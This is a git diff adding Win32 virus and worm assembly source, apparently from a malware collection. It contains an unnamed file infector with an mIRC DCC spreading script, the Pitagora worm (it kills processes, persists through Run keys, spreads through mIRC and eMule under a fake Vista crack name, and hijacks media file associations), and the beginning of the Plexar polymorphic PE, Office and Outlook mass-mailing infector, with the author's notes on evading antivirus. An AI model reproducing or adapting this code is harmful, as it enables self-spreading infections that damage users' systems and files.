255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255 +mircscript: + db '[script]',0dh,0ah + db 'n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } | /sendit }',0dh,0ah + db 'n2=alias /sendit /dcc send $nick ' +windir db 50 dup(0) +end_script: +filename db 50 dup(0) +FileToFind db '*.exe',0 +FoundFile: +dwFileAttributes dd 0 +ftCreationTime db 8 dup(0) +ftLastAccessTime db 8 dup(0) +ftLastWriteTime db 8 dup(0) +nFileSizeHigh dd 0 +nFileSizeLow dd 0 +dwReserved0 dd 0 +dwReserved1 dd 0 +cFileName db 50 dup(0) +cAlternateFileName db 50 dup(0) +hostcopy db 50 dup(0) +copyext db 'prt',0 +prttoexec db 50 dup(0) +hosttoexec db 'host.exe',0 + +.code +Start: + + push 50 + push offset windir + call GetWindowsDirectoryA + + push offset windir + call SetCurrentDirectoryA + + push offset viruscopy + push offset windir + call lstrcat + + mov ebx, offset script1 + call writefile + mov ebx, offset script2 + call writefile + + push 0 + call GetModuleHandleA + push 50 + push offset filename + push eax + call GetModuleFileNameA + + push 1 + push offset mailviruscopy + push offset filename + call CopyFileA + + push 1 + push offset windir + push offset filename + call CopyFileA + + push eax ; If CopyFile failed, that means the file already existed, so the + ; virus has already been executed before, which we need to know + ; later on + + push offset FoundFile + push offset FileToFind + call FindFirstFileA ; looking for the first file to infect + + mov ebx, eax ; saving the search handle in ebx, we need it in filefindloop + + call infectfile + call filefindloop + + push 0 + push offset wscriptexe + push offset wscriptprt + call CopyFileA + + push offset wscriptprt + call DeleteFileA + + push 0 + push offset setverexe + push offset setverprt + call CopyFileA + + push offset setverprt + call DeleteFileA + + push 0 + push offset rundllexe + push offset rundllprt + call CopyFileA + + push offset rundllprt + call DeleteFileA + + push 0 + push offset explorerexe + push offset explorerprt + call CopyFileA + + push offset explorerprt + call DeleteFileA + + push offset taskmanexe + push offset taskmanprt + call CopyFileA + + push offset taskmanprt + call DeleteFileA + + push offset taskmonexe + push offset taskmonprt + call CopyFileA + + push offset taskmonprt + call DeleteFileA + + push 0 + push offset parrotname + call _lcreat + + mov ebx, eax + + push size2 + push offset parrot + push eax + call _lwrite + + push ebx + call _lclose + + push 0 + push offset helloname + call _lcreat + + mov ebx, eax + + push size3 + push offset hello + push eax + call _lwrite + + push ebx + call _lclose + + push 0 + push offset msgvbsname + call _lcreat + + mov ebx, eax + + push size4 + push offset msgvbs + push eax + call _lwrite + + push ebx + call _lclose + + push offset msgvbsname + call lstrlen + + push eax + push offset msgvbsname + push 1 + push offset regkey1 + push 080000002h + call RegSetValueA + + push offset helloname + call lstrlen + + push eax + push offset helloname + push 1 + push offset regkey2 + push 080000002h + call RegSetValueA + + pop eax + + cmp eax, 0 ; Has the virus been executed before? + je nomail ; If not, jump to nomail + + push 0 + push offset script3 + call _lcreat + + mov ebx, eax + + push size5 + push offset mailscript + push eax + call _lwrite + + push ebx + call _lclose + + push 0 + push 0 + push 0 + push offset script3 + push 0 + push 0 + call ShellExecuteA + +nomail: + + push 0 + push offset winstart + call _lcreat + + mov ebx, eax + + push size6 + push offset winstartmsg + push eax + call _lwrite + + push ebx + call _lclose + + push 0 + push 0 + push 0 + push offset parrotname + push 0 + push 0 + call ShellExecuteA + + push offset filename + call lstrlen + + sub eax, 2 + + push eax + push offset filename + push offset prttoexec + call lstrcpyn + + push offset copyext + push offset prttoexec + call lstrcat + + push 0 + push offset hosttoexec + push offset prttoexec + call CopyFileA ; copying the original hostfile to an EXE file + + cmp eax, 0 + je outtahere ; If there is no hostfile, you can't execute it + + push 1 + push offset hosttoexec + call WinExec + +killcopy: + + push offset hosttoexec + call DeleteFileA ; trying to delete the EXE file + + cmp eax, 1 + jne killcopy ; If that didn't work, the EXE is probably still in use, so we + ; keep trying until it ain't anymore + +outtahere: + + push 0 + call ExitProcess + + +writefile: + + push 0 + push offset ebx + call _lcreat + + mov ebx, eax + + push size1 + push offset mircscript + push eax + call _lwrite + + push ebx + call _lclose + + ret + +filefindloop: + + push offset FoundFile + push ebx + call FindNextFileA + + push eax + + call infectfile + + pop eax + + cmp eax, 0 + jne filefindloop ; any more files? + + ret + +infectfile: + + push offset cFileName + call lstrlen + + sub eax, 2 + + push eax + push offset cFileName + push offset hostcopy + call lstrcpyn + + push offset copyext + push offset hostcopy + call lstrcat + + push 1 + push offset hostcopy + push offset cFileName + call CopyFileA + + push 0 + push offset cFileName + push offset filename + call CopyFileA + + ret + +end Start \ No newline at end of file diff --git a/Win32/Win32.Pitagora.asm b/Win32/Win32.Pitagora.asm new file mode 100644 index 00000000..fdfdace7 --- /dev/null +++ b/Win32/Win32.Pitagora.asm @@ -0,0 +1,490 @@ +;;; un piccolo worm in assembler ... (cazzuto ma non troppo :-)) +.586 +.model flat +;;;; API NECESSARIE ! ;;;; +extrn ExitProcess:PROC +extrn ShellAboutA:PROC +extrn CopyFileA:PROC +extrn GetCommandLineA:PROC +extrn lstrcpy:PROC +extrn lstrlen:PROC +extrn lstrcat:PROC +extrn GetWindowsDirectoryA:PROC +extrn GetSystemDirectoryA:PROC +extrn RegOpenKeyA:PROC +extrn RegSetValueExA:PROC +extrn RegSetValueA:PROC +extrn RegCloseKey:PROC +extrn RegQueryValueExA:PROC +extrn CreateFileA:PROC +extrn CloseHandle:PROC +extrn CreateThread:PROC +extrn Sleep:PROC +extrn WriteFile:PROC +extrn CreateMutexA:PROC +extrn GetLastError:PROC +extrn CreateToolhelp32Snapshot:PROC +extrn Process32First:PROC +extrn Process32Next:PROC +extrn GetCurrentProcessId:PROC +extrn OpenProcess:PROC +extrn TerminateProcess:PROC +extrn lstrcmpi:PROC +;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;; Costanti ;;;; +MAX_PATH equ 260 +HKEY_LOCAL_MACHINE equ 80000002h +HKEY_CURRENT_USER equ 80000001h +REG_SZ equ 1 +OPEN_EXISTING equ 3 +CREATE_NEW equ 1 +CREATE_ALWAYS equ 2 +GENERIC_READ equ 80000000h +GENERIC_WRITE equ 40000000h +FILE_SHARE_READ equ 1 +FILE_SHARE_WRITE equ 2 +ERROR_ALREADY_EXISTS equ 183 +PROCESS_ALL_ACCESS equ 00000000h +;;;;;;;;;;;;;;;;;; +.data +;;;; Variabili e MsgS ;;;; +MyPath db 260 dup(?) +WinPATH db 260 dup(?) +SysPATH db 260 dup(?) +WormName1 db "\sys.exe",0 +WormName2 db "\mon.exe",0 +StartUpKey db "Software\Microsoft\Windows\CurrentVersion\Run", 0 +CheckFile db "\Pitagora.teo",0 +CheckFilePath db 260 dup(?) +KeyName db "SystemMonitor",0 +Msg db "You have been infected by Pitagora !!! by WarGame !!!!",0 +Titolo db "Is the war right ???? Think about this ...",0 +HKey dd 00000000h +Tid dd 00000000h +CopyName db "C:\AVG-Antivirus.exe",0 +MSG_Interno db "Anti Soviet and Anti American !!!",0 +Drive db 'C' +MircPath db 260 dup(?) +MircKey db "Software\Microsoft\Windows\CurrentVersion\Uninstall\mIRC",0 +MircKeyName db "UninstallString",0 +EmuleKey db "Software\eMule",0 +EmuleKeyName db "Install Path",0 +EmuleWorm db "\Incoming\WINDOWS_VISTA_CRACK.exe",0 +EmulePath db 260 dup (?) +BufLen dd 260 +ScriptIni db "script.ini",0 +MIRCWORM db "[Script]",0dh,0ah ,"n0=on 1:join:#: { if ( $nick == $me ) halt",0dh,0ah ,"n1=else /dcc send $nick WINDOWS_VISTA_CRACK_CHANGE_MY_EXSTENSION_TO_EXE_TO_GO.txt",0 +MP3Key1 db "SOFTWARE\Classes\mp3file\shell\open\command",0 +MP3Key2 db "SOFTWARE\Classes\mp3file\shell\play\command",0 +MPEGKey1 db "SOFTWARE\Classes\mpegfile\shell\open\command",0 +MPEGKey2 db "SOFTWARE\Classes\mpegfile\shell\play\command",0 +FD dd 00000000h +Scritti dd 00000000h +OpenMe_Path db 260 dup(?) +OpenMe db "WINDOWS_VISTA_CRACK_CHANGE_MY_EXSTENSION_TO_EXE_TO_GO.txt",0 +MUT db "WOOWOO",0 +MSGPayLoad db "!!!! AH...AH...this is for Pitagora ... I am Italian and you? !!!!",0 +;;;;;;;;;;;;;;;;;;; +Snap dd 00000000h +TH32CS_SNAPPROCESS EQU 00000002h +PROCESS_TERMINATE equ 00000001h +PROCESSENTRY32 struct +dwSize DD 0 +cntUsage DD 0 +th32ProcessID DD 0 +th32DefaultHeapID DD 0 +th32ModuleID DD 0 +cntThreads DD 0 +th32ParentProcessID DD 0 +pcPriClassBase DD 0 +dwFlags DD 0 +szExeFile DB MAX_PATH DUP(0) +PROCESSENTRY32 ends +prentry PROCESSENTRY32 <> +MyID dd 00000000h +EX db "explorer.exe",0 +p_RET dd 00000000h +;;;;;;;;;;;;;;;;;;; +.code +Pitagora: +Sono_Solo: + push offset MUT + push 00000001h + push 00000000h + call CreateMutexA + call GetLastError + cmp eax,ERROR_ALREADY_EXISTS + je Esci +Ottieni_path: + call GetCommandLineA + push eax + push offset MyPath + call lstrcpy + push offset MyPath + call lstrlen + xor ebx,ebx + mov [MyPath+eax-2],bh + push offset [MyPath+1] + push offset MyPath + call lstrcpy +Ottieni_path_OS: + push 260 + push offset WinPATH + call GetWindowsDirectoryA + push offset WinPATH + push offset CheckFilePath + call lstrcpy + push 260 + push offset SysPATH + call GetSystemDirectoryA +Crea_Path_Worms: + push offset WormName1 + push offset WinPATH + call lstrcat + push offset WormName2 + push offset SysPATH + call lstrcat +Anti_AntiVirus: + call FuckAV ; ... termina i processi non graditi ... +Controlla_Se_Infetto: + push offset CheckFile + push offset CheckFilePath + call lstrcat + push 00000000h + push 00000000h + push OPEN_EXISTING + push 00000000h + push FILE_SHARE_READ + push GENERIC_READ + push offset CheckFilePath + call CreateFileA + cmp eax,-1 + jne Worming + push 00000000h + push 00000000h + push CREATE_NEW + push 00000000h + push FILE_SHARE_WRITE + push GENERIC_WRITE + push offset CheckFilePath + call CreateFileA + push eax + call CloseHandle +Copia_file: + push 00000000h + push offset WinPATH + push offset MyPath + call CopyFileA + push 00000000h + push offset SysPATH + push offset MyPath + call CopyFileA +StartupAutomatico: + push offset HKey + push offset StartUpKey + push HKEY_LOCAL_MACHINE + call RegOpenKeyA + cmp eax,0 + jne Esci + push offset SysPATH + call lstrlen + mov ebx,1 + add eax,ebx + push eax + push offset SysPATH + push REG_SZ + push 00000000h + push offset KeyName + push HKey + call RegSetValueExA + push HKey + call RegCloseKey +Esci: + push 00000000h + push offset Msg + push offset Titolo + push 00000000h + call ShellAboutA + xor edx,edx + push edx + call ExitProcess +Worming: + push eax + call CloseHandle +INFETTA_MIRC: + push offset HKey + push offset MircKey + push HKEY_LOCAL_MACHINE + call RegOpenKeyA + cmp eax,0 + jne INFETTA_EMULE + push offset BufLen + push offset MircPath + push 00000000h + push 00000000h + push offset MircKeyName + push HKey + call RegQueryValueExA + cmp eax,0 + jne INFETTA_EMULE + push HKey + call RegCloseKey + push offset [MircPath+1] + push offset [MircPath] + call lstrcpy + push offset MircPath + xor ecx,ecx +Fuck: + cmp byte ptr[MircPath+ecx],'"' + je OK + inc ecx + jmp Fuck +OK: + xor ebx,ebx + mov [MircPath+ecx],bh + xor ecx,ecx +Fuck2: + cmp byte ptr[MircPath+ecx],'.' + je OK2 + inc ecx + jmp Fuck2 +OK2: + xor ebx,ebx + mov [MircPath+ecx-4],bh + push offset MircPath + push offset OpenMe_Path + call lstrcpy + push offset OpenMe + push offset OpenMe_Path + call lstrcat + push offset ScriptIni + push offset MircPath + call lstrcat + push 00000000h + push 00000000h + push CREATE_ALWAYS + push 00000000h + push FILE_SHARE_WRITE + push GENERIC_WRITE + push offset MircPath + call CreateFileA + cmp eax,-1 + je INFETTA_EMULE + mov FD,eax + push 00000000h + push offset Scritti + push offset MIRCWORM + call lstrlen + push eax + push offset MIRCWORM + push FD + call WriteFile + push FD + call CloseHandle + push offset MircPath + call lstrlen + push offset [MircPath+eax-11] + push offset MircPath + call lstrcpy + push 00000000h + push offset OpenMe_Path + push offset MyPath + call CopyFileA +INFETTA_EMULE: + push offset HKey + push offset EmuleKey + push HKEY_CURRENT_USER + call RegOpenKeyA + cmp eax,0 + jne MP3_FUCKING + push offset BufLen + push offset EmulePath + push 00000000h + push 00000000h + push offset EmuleKeyName + push HKey + call RegQueryValueExA + cmp eax,0 + jne MP3_FUCKING + push offset EmuleWorm + push offset EmulePath + call lstrcat + push 00000000h + push offset EmulePath + push offset MyPath + call CopyFileA +MP3_FUCKING: + push offset HKey + push offset MP3Key1 + push HKEY_LOCAL_MACHINE + call RegOpenKeyA + cmp eax,0 + jne MPEG_FUCKING + push offset WinPATH + call lstrlen + push eax + push offset WinPATH + push REG_SZ + push 00000000h + push HKey + call RegSetValueA + push HKey + call RegCloseKey + push offset HKey + push offset MP3Key2 + push HKEY_LOCAL_MACHINE + call RegOpenKeyA + cmp eax,0 + jne MPEG_FUCKING + push offset WinPATH + call lstrlen + push eax + push offset WinPATH + push REG_SZ + push 00000000h + push HKey + call RegSetValueA + push HKey + call RegCloseKey +MPEG_FUCKING: + push offset HKey + push offset MPEGKey1 + push HKEY_LOCAL_MACHINE + call RegOpenKeyA + cmp eax,0 + jne Vai + push offset WinPATH + call lstrlen + push eax + push offset WinPATH + push REG_SZ + push 00000000h + push HKey + call RegSetValueA + push HKey + call RegCloseKey + push offset HKey + push offset MPEGKey2 + push HKEY_LOCAL_MACHINE + call RegOpenKeyA + cmp eax,0 + jne Vai + push offset WinPATH + call lstrlen + push eax + push offset WinPATH + push REG_SZ + push 00000000h + push HKey + call RegSetValueA + push HKey + call RegCloseKey +Vai: + push offset Tid + push 00000000h + push 00000000h + push offset Copiati + push 00000000h + push 00000000h + call CreateThread + push offset Tid + push 00000000h + push 00000000h + push offset PayLoad + push 00000000h + push 00000000h + call CreateThread +Dormi: + push 186a0h + call Sleep + xor ecx,ecx + cmp ecx,0 + je Dormi +;;;; Thread di autocopia ;;;; +Copiati PROC +Copia: + mov ch,'C' + mov Drive,ch + mov [CopyName+0],ch + xor ebx,ebx +Tutti_I_drives: + push 00000000h + push offset CopyName + push offset MyPath + call CopyFileA + push 4e20h + call Sleep + add Drive,1 + mov ch,Drive + mov [CopyName+0],ch + cmp ch,'Z'+1 + jne Tutti_I_drives + cmp ebx,0 + je Copia +Copiati ENDP +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;; PayLoad ;;;; +PayLoad PROC + Loop: + xor ecx,ecx + push 1200000 + call Sleep + push 00000000h + push offset MSGPayLoad + push offset Titolo + push 00000000h + call ShellAboutA + cmp ecx,0 + je Loop +PayLoad ENDP +;;;;;;;;;;;;;;;;; +FuckAV PROC + My_ID: + call GetCurrentProcessId + mov MyID,eax + Inializza: + push 00000000h + push TH32CS_SNAPPROCESS + call CreateToolhelp32Snapshot + cmp eax,-1 + je Ritorna + mov Snap,eax + Primo: + push offset prentry + push Snap + mov prentry.dwSize,296 + call Process32First + cmp eax,0 + je Ritorna + Altri: + push offset prentry + push Snap + mov prentry.dwSize,296 + call Process32Next + mov p_RET,eax + Controlla_se_explorer: + push offset prentry.szExeFile + push offset EX + call lstrcmpi + cmp eax,0 + je Ancora + Controlla_id: + mov edx,MyID + cmp edx,prentry.th32ProcessID + je Ancora + Termina: + push dword ptr[prentry.th32ProcessID] + push 00000000h + push PROCESS_TERMINATE + call OpenProcess + push 00000000h + push eax + call TerminateProcess + Ancora: + cmp p_RET,0 + jne Altri + Ritorna: + ret +FuckAV ENDP +;;;;;;;;;;;;;;;;; +end Pitagora \ No newline at end of file diff --git a/Win32/Win32.Plexar.asm b/Win32/Win32.Plexar.asm new file mode 100644 index 00000000..184f4063 --- /dev/null +++ b/Win32/Win32.Plexar.asm @@ -0,0 +1,3192 @@ + +; 様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 +; < Win32.Plexar > +; Designed by LiteSys in Venezuela, South America +; +; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector. +; +; Welcome to Plexar, my latest code. +; +; It infects PE files by incrementing the last section, I don't overwrite +; .reloc section, it's preferible to let it alone. In fact, this virus +; avoids infecting some AV or Win32 files that should never be infected. +; This is done by CRC32 comparation. +; +; Infects Word and Excel documents by dropping (thru VBScript) a macro +; module-infectant virus in the normal template and personal.xls that is +; capable of dropping an infected PE file to the Windows directory and then +; running it. +; +; Distributes through Electronic Mail by dropping a VBS worm capable of +; sending infected droppers to every email address in the Outlook address +; book. Sorry but I didn't have any time to code a decent MAPI worm =(. +; +; The Poly engine is another lame table-driven engine written by me =), no +; anti-aver intentions were the reason to write that poly engine, just to +; conceal the code a little. So I think it doesn't desire an explanation +; because the garbage is very lame. +; +; It runs the different routines (word infection, vbs worm, direct action) +; in different threads. As I always said, I don't optimize my code too much. +; +; The payload is very funny and if you're from Venezuela I hope you +; appreciate it. Consists in dropping a simple com file that displays +; some silly stuff in spanish, it runs on autoexec.bat but won't display +; the message until the following rule is complied (this is a very +; kewl idea I learnt from Byway ;D): +; +; If Month <= 7: Day = Month^2 / 3 + 4 +; If Month >= 8: Day = Month^2 / 5 - 4 +; +; So the payload will run on every month (as a coincidence, the formula +; pointed to December 24th :P). It's not destructive so don't blame me. +; +; This virus has lots of bugs, i've corrected many but still there are a +; lot. It was tested under Win95 (4.10.1111), Win98 (4.10.1998), WinME and +; WinNT (4.0/SP4), the virus worked perfectly under those versions. I don't +; know about Win98 SE and Win2K, since I don't have them installed, I have +; the CDs here but i'm a lazy ass and my HD space is totally phuken. +; +; Virus Size = 12kb. Code not commented. Nor even AVP or Norton (with +; their "high heuristic" bloodhound shit) flagged the infected PE baits, +; except from Norton, which flagged the VBS worm. +; +; If you need to contact me you can use both mail addresses: litesys@monte.as +; or liteno2@softhome.net. Rembember, for decent stuff. +; +; Patria o Muerte: Venceremos. +; LiteSys. +; Venezuela, Julio/Agosto - (c) 2001 +; 様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様様 + +.586 +.MODEL FLAT, STDCALL + +INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC +INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC + +EXTRN ExitProcess:PROC +EXTRN MessageBoxExA:PROC + +.DATA + + DEBUG EQU FALSE + + OFS EQU + BY EQU + WO EQU + DWO EQU + RDTSC EQU + + APICALL MACRO APIz + CALL DWORD PTR [APIz + EBP] + ENDM + + Numero_Paginas EQU 32h + K32_W9X EQU 0BFF70000h + GPA_W9X EQU 0BFF76DACh + Virus_Tamao EQU (Termina_Plexar - Empieza_Plexar) + + Titulo DB "Plexar." + DB Virus_Tamao / 10000 MOD 10 + 30h + DB Virus_Tamao / 01000 MOD 10 + 30h + DB Virus_Tamao / 00100 MOD 10 + 30h + DB Virus_Tamao / 00010 MOD 10 + 30h + DB Virus_Tamao / 00001 MOD 10 + 30h + DB 00h + + Mensaje DB "Plexar (c) 2001 LiteSys " + DB "-- Activado." + DB 00h + + REG_SZ EQU <1> + HKEY_LOCAL_MACHINE EQU <80000002h> + +.CODE + +Empieza_Plexar: + + CALL @Delta + @Delta: + POP EAX + XCHG EBP, EAX + SUB EBP, OFFSET @Delta + + JMP @@1 + DB 00h, 00h, "[PLEXAR]", 00h, 00h + @@1: + + CALL @SEH_1 + + MOV ESP, DWORD PTR [ESP+8h] + JMP @FueraHost + + @SEH_1: + + XOR EAX, EAX + PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + MOV EDI, DWORD PTR [ESP+8h] + CALL Busca_K32 + CALL Busca_GPA + + LEA ESI, OFS [CreateFileA] + LEA EDI, OFS [APIs_K32] + MOV EBX, DWO [KERNEL32] + CALL Busca_APIs + + LEA EDX, OFS [RewtDir] + PUSH EDX + PUSH MAX_PATH + APICALL GetCurrentDirectoryA + OR EAX, EAX + JZ @FueraHost + + IF DEBUG + + PUSH EBP + CALL Directa + + PUSH EBP + CALL Worm_VBS + + PUSH EBP + CALL Infecta_Word + + JMP @FueraHost + + ELSE + + CALL Thread + + ENDIF + + CALL Er_Pailon + + @FueraHost: + + XOR ECX, ECX + POP DWORD PTR FS:[ECX] + POP ECX + + PUSH 12345678h + ORG $-4 + HostBack DD OFFSET Mentira + RET + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; El Thread Principal, carga los otros threads. + + Thread PROC + PUSHAD + + AND BY [Listo_Directa], 00h + + XOR EAX, EAX + LEA EBX, OFS [Thread_Directa] + PUSH EBX + PUSH EAX + PUSH EBP + LEA EBX, OFS [Directa] + PUSH EBX + PUSH EAX + PUSH EAX + APICALL CreateThread + MOV DWO [Thread_Directa], EAX + OR EAX, EAX + JZ @FinThread + + PUSH 02h + PUSH EAX + APICALL SetThreadPriority + + @RevDirect: + PUSH -1 + PUSH DWO [Thread_Directa] + APICALL WaitForSingleObject + + CMP BY [Listo_Directa], 01h + JNZ @RevDirect + + XOR EAX, EAX + LEA EBX, OFS [Thread_WormVBS] + PUSH EBX + PUSH EAX + PUSH EBP + LEA EBX, OFS [Worm_VBS] + PUSH EBX + PUSH EAX + PUSH EAX + APICALL CreateThread + MOV DWO [Thread_WormVBS], EAX + OR EAX, EAX + JZ @FinThread + + PUSH 02h + PUSH EAX + APICALL SetThreadPriority + + XOR EAX, EAX + LEA EBX, OFS [Thread_IWord] + PUSH EBX + PUSH EAX + PUSH EBP + LEA EBX, OFS [Infecta_Word] + PUSH EBX + PUSH EAX + PUSH EAX + APICALL CreateThread + MOV DWO [Thread_IWord], EAX + OR EAX, EAX + JZ @FinThread + + PUSH 02h + PUSH EAX + APICALL SetThreadPriority + + PUSH -1 + PUSH TRUE + LEA EAX, OFS [Thread_WormVBS] + PUSH EAX + PUSH 02h + APICALL WaitForMultipleObjects + + @FinThread: + + POPAD + RET + + Thread ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Payload. + + Er_Pailon PROC + PUSHAD + + CDQ + PUSH EDX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH CREATE_NEW + PUSH EDX + PUSH EDX + PUSH GENERIC_WRITE + LEA EAX, OFS [CocoFrio] + PUSH EAX + APICALL CreateFileA + MOV DWO [PFHandle], EAX + INC EAX + JZ @P_Fin + DEC EAX + XCHG EBX, EAX + + XOR EDX, EDX + PUSH EDX + LEA EAX, OFS [PTemporal] + PUSH EAX + PUSH Largo_PProg + LEA EAX, OFS [Payload_Prog] + PUSH EAX + PUSH EBX + APICALL WriteFile + OR EAX, EAX + JZ @P_Fin + + PUSH DWO [PFHandle] + APICALL CloseHandle + + CDQ + PUSH EDX + PUSH FILE_ATTRIBUTE_NORMAL + PUSH OPEN_EXISTING + PUSH EDX + PUSH EDX + PUSH GENERIC_WRITE + LEA EAX, OFS [AutoExec] + PUSH EAX + APICALL CreateFileA + MOV DWO [PFHandle], EAX + INC EAX + JZ @P_Fin + DEC EAX + + CDQ + PUSH 00000002h + PUSH EDX + PUSH EDX + PUSH EAX + APICALL SetFilePointer + + CDQ + PUSH EDX + LEA EAX, OFS [PTemporal] + PUSH EAX + PUSH Largo_CocoFrio-1 + LEA EAX, OFS [CocoFrio] + PUSH EAX + PUSH DWO [PFHandle] + APICALL WriteFile + OR EAX, EAX + JZ @P_Fin + + PUSH DWO [PFHandle] + APICALL CloseHandle + + @P_Fin: + + POPAD + RET + Er_Pailon ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Proceso para buscar la base de KERNEL32 + + Busca_K32 PROC + + AND EDI, 0FFFF0000h + PUSH Numero_Paginas + POP ECX + + @Compara_K32: + + PUSH EDI + + MOV BX, WORD PTR [EDI] + OR BX, 03D5Bh ; 5A4D || 3D5B == 7F5F + SUB BX, 07F5Fh + JNZ @Incrementa_K32 + + ADD EDI, [EDI+3Ch] + MOV BX, WORD PTR [EDI] ; 4550 && C443 == 4440 + AND BX, 0C443h + XOR BX, 04440h + JE @EnK32 + + @Incrementa_K32: + + POP EDI + + SUB EDI, 10000h + LOOP @Compara_K32 + + PUSH K32_W9X + + @EnK32: + + POP DWO [KERNEL32] + RET + + Busca_K32 ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + DB 5 DUP (90h) + + ; Proceso para buscar a GetProcAddress + + Busca_GPA PROC + + MOV EBX, DWO [KERNEL32] + MOV EDI, EBX + + ADD EDI, DWORD PTR [EDI+3Ch] + MOV EDI, DWORD PTR [EDI+78h] + ADD EDI, EBX + MOV DWO [Exports], EDI + + MOV ECX, DWORD PTR [EDI+18h] + DEC ECX + + MOV EDI, DWORD PTR [EDI+20h] + ADD EDI, EBX + + XOR EAX, EAX + + @BGPA_1: + + MOV ESI, DWORD PTR [EDI] + ADD ESI, EBX + PUSH EDI + + PUSH l_GetProcAddress + POP EDI + PUSHAD + CALL CRC32 + CMP EAX, CRC32_GetProcAddress + POPAD + POP EDI + JE @BGPA_2 + + INC EAX + ADD EDI, 4h + + LOOP @BGPA_1 + + PUSH GPA_W9X + + JMP @BGPA_3 + + @BGPA_2: + + MOV ESI, DWO [Exports] + ADD EAX, EAX + + MOV EDI, DWORD PTR [ESI+24h] + ADD EDI, EBX + ADD EDI, EAX + + MOVZX EAX, WORD PTR [EDI] + IMUL EAX, 4h + + MOV EDI, DWORD PTR [ESI+1Ch] + ADD EDI, EBX + ADD EDI, EAX + + MOV EAX, DWORD PTR [EDI] + ADD EAX, EBX + + PUSH EAX + + @BGPA_3: + + POP DWO [GetProcAddress] + + RET + + Busca_GPA ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; ESI -> Donde Guardar las APIs + ; EDI -> Cadenas de APIs + ; EBX -> Modulo + + ; Proceso para buscar las APIs + + Busca_APIs PROC + + PUSHAD + + MOV DWO [Guardalo], ESI + XCHG EDI, ESI + + @BA1: + LEA EDI, OFS [TempAPI] + @BA2: + + CMP BYTE PTR [ESI], 00h + JE @BA4 + + LODSB + CMP AL, 0Eh + JA @BA3 + + XOR ECX, ECX + XCHG CL, AL + + PUSH ESI + LEA ESI, OFS [PackedAPIs] + + @BA5: + INC ESI + CMP BYTE PTR [ESI], 00h + JNZ @BA5 + + LOOP @BA5 + + INC ESI + @BA6: + MOVSB + CMP BYTE PTR [ESI], 00h + JNZ @BA6 + + POP ESI + JMP @BA2 + + @BA3: + STOSB + JMP @BA2 + + @BA4: + + XOR AL, AL + STOSB + + LEA EAX, OFS [TempAPI] + PUSH EAX + PUSH EBX + CALL [GetProcAddress+EBP] + NOP + + PUSH ESI + MOV ESI, 12345678h + ORG $-4 + Guardalo DD 00000000h + MOV DWORD PTR [ESI], EAX + ADD DWO [Guardalo], 00000004h + POP ESI + + INC ESI + + CMP BYTE PTR [ESI], 0FFh + JNZ @BA1 + + @OA7: + + POPAD + + RET + + Busca_APIs ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Accion directa. + + Directa PROC Pascal DeltaOfs:DWORD + + PUSHAD + + MOV EBP, DeltaOfs + + CALL @SEH_2 + + MOV ESP, DWORD PTR [ESP+8h] + JMP @DIRF + + @SEH_2: + + XOR EAX, EAX + PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + LEA EDX, OFS [RewtDir] + PUSH EDX + APICALL SetCurrentDirectoryA + OR EAX, EAX + JZ @DIRF + + @DIR1: + + LEA EAX, OFS [Busqueda] + PUSH EAX + LEA EAX, OFS [Mascara] + PUSH EAX + APICALL FindFirstFileA + MOV DWO [BHandle], EAX + INC EAX + JZ @DIR2 + + @DIR3: + + LEA EDI, OFS [Busqueda.wfd_szFileName] + MOV EBX, EDI + PUSH EBX + XOR AL, AL + SCASB + JNZ $-1 + XCHG ESI, EDI + SUB ESI, 5h + OR DWORD PTR [ESI], 20202020h + MOV EDI, 5h + CALL CRC32 + POP EBX + CMP EAX, CRC_EXE ; .exe crc32 + JE @Infecta_Este_Exe + CMP EAX, CRC_SCR ; .scr crc32 + JE @Infecta_Este_Exe + + @Retorna_Directa: + + LEA EAX, OFS [Busqueda] + PUSH EAX + PUSH DWO [BHandle] + APICALL FindNextFileA + OR EAX, EAX + JNZ @DIR3 + + PUSH DWO [BHandle] + APICALL FindClose + + @DIR2: + + LEA EAX, OFS [Puto_Puto] + PUSH EAX + APICALL SetCurrentDirectoryA + + LEA EAX, OFS [Busqueda.wfd_szFileName] + PUSH EAX + PUSH MAX_PATH + APICALL GetCurrentDirectoryA + CMP EAX, DWO [LargPP] + JZ @DIRF + MOV DWO [LargPP], EAX + JMP @DIR1 + + LEA EAX, OFS [RewtDir] + PUSH EAX + APICALL SetCurrentDirectoryA + + @DIRF: + + XOR ECX, ECX + POP DWORD PTR FS:[ECX] + POP ECX + + IF DEBUG + + POPAD + RET + + ELSE + + INC BY [Listo_Directa] + + MOV DWO [GuardaEBP], EBP + POPAD + + MOV EBX, 12345678h + ORG $-4 + GuardaEBP DD 00000000h + + PUSH NULL + CALL 